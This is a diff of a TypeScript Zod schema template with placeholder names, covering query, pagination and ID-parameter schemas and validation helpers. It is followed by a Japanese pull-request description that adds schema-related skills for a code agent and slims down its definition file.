+/**
+ * {{FEATURE_NAME}}リスト出力型
+ */
+export type {{FEATURE_NAME}}ListOutput = z.infer<typeof {{featureName}}ListOutputSchema>;
+
+// ============================================================
+// クエリスキーマ（検索・フィルタリング用）
+// ============================================================
+
+/**
+ * {{FEATURE_NAME}}検索クエリスキーマ
+ */
+export const {{featureName}}QuerySchema = z.object({
+  // 検索条件
+  q: z.string().max(100).optional().describe('検索キーワード'),
+
+  // フィルター
+  status: z.enum(['active', 'inactive', 'pending']).optional().describe('ステータスフィルター'),
+  tags: z.array(z.string()).optional().describe('タグフィルター'),
+
+  // ページネーション
+  page: z.coerce.number().int().positive().default(1).describe('ページ番号'),
+  pageSize: z.coerce.number().int().min(1).max(100).default(20).describe('ページサイズ'),
+
+  // ソート
+  sortBy: z.enum(['createdAt', 'updatedAt', 'name']).default('createdAt').describe('ソートフィールド'),
+  sortOrder: z.enum(['asc', 'desc']).default('desc').describe('ソート順'),
+});
+
+/**
+ * {{FEATURE_NAME}}検索クエリ型
+ */
+export type {{FEATURE_NAME}}Query = z.infer<typeof {{featureName}}QuerySchema>;
+
+// ============================================================
+// IDパラメータスキーマ（パスパラメータ用）
+// ============================================================
+
+/**
+ * {{FEATURE_NAME}} IDパラメータスキーマ
+ */
+export const {{featureName}}IdParamSchema = z.object({
+  id: uuidSchema.describe('{{FEATURE_NAME}} ID'),
+});
+
+/**
+ * {{FEATURE_NAME}} IDパラメータ型
+ */
+export type {{FEATURE_NAME}}IdParam = z.infer<typeof {{featureName}}IdParamSchema>;
+
+// ============================================================
+// バリデーションヘルパー
+// ============================================================
+
+/**
+ * 入力データのバリデーション
+ */
+export function validateCreate{{FEATURE_NAME}}Input(data: unknown): Create{{FEATURE_NAME}}Input {
+  return create{{FEATURE_NAME}}InputSchema.parse(data);
+}
+
+/**
+ * 入力データの安全なバリデーション
+ */
+export function safeValidateCreate{{FEATURE_NAME}}Input(
+  data: unknown
+): z.SafeParseReturnType<unknown, Create{{FEATURE_NAME}}Input> {
+  return create{{FEATURE_NAME}}InputSchema.safeParse(data);
+}


### PR DESCRIPTION
## 概要
@schema-def エージェント用の5つの専門スキルを追加し、エージェント本体を軽量化しました。

## 変更内容

### 新規スキル（5つ）
| スキル名 | パス | 概要 |
|---------|------|------|
| **zod-validation** | `.claude/skills/zod-validation/` | Zodスキーマ定義、型推論、カスタムバリデーション |
| **type-safety-patterns** | `.claude/skills/type-safety-patterns/` | TypeScript厳格モード、型ガード、Discriminated Unions |
| **input-sanitization** | `.claude/skills/input-sanitization/` | XSS対策、SQLインジェクション対策、コマンドインジェクション対策 |
| **error-message-design** | `.claude/skills/error-message-design/` | ユーザーフレンドリーなエラーメッセージ、i18n対応、API応答設計 |
| **json-schema** | `.claude/skills/json-schema/` | JSON Schema仕様（Draft 2020-12）、OpenAPI連携、スキーマ合成 |

### 各スキルの構成
- `SKILL.md`: コアスキルファイル（Progressive Disclosure対応）
- `resources/`: 詳細リソース（4-5ファイル）
- `scripts/`: 検証スクリプト（.mjs）
- `templates/`: 実装テンプレート（.ts/.json）

### エージェント軽量化
| 項目 | 変更前 | 変更後 |
|------|--------|--------|
| `@schema-def.md` | 1326行 | 449行（66%削減） |
| バージョン | v1.0.1 | v2.0.0 |

### リスト更新
- `agent_list.md`: @schema-defセクションにスキルパス追加
- `skill_list.md`: @schema-defセクションにスキルパス追加

## テスト
- [x] ファイル構造の確認
- [x] スキルファイルの存在確認
- [x] エージェント定義の整合性確認

## 関連Issue
なし

## 破壊的変更
なし（既存のエージェント機能は維持、スキル参照方式に移行）

---

🤖 Generated with [Claude Code](https://claude.com/claude-code)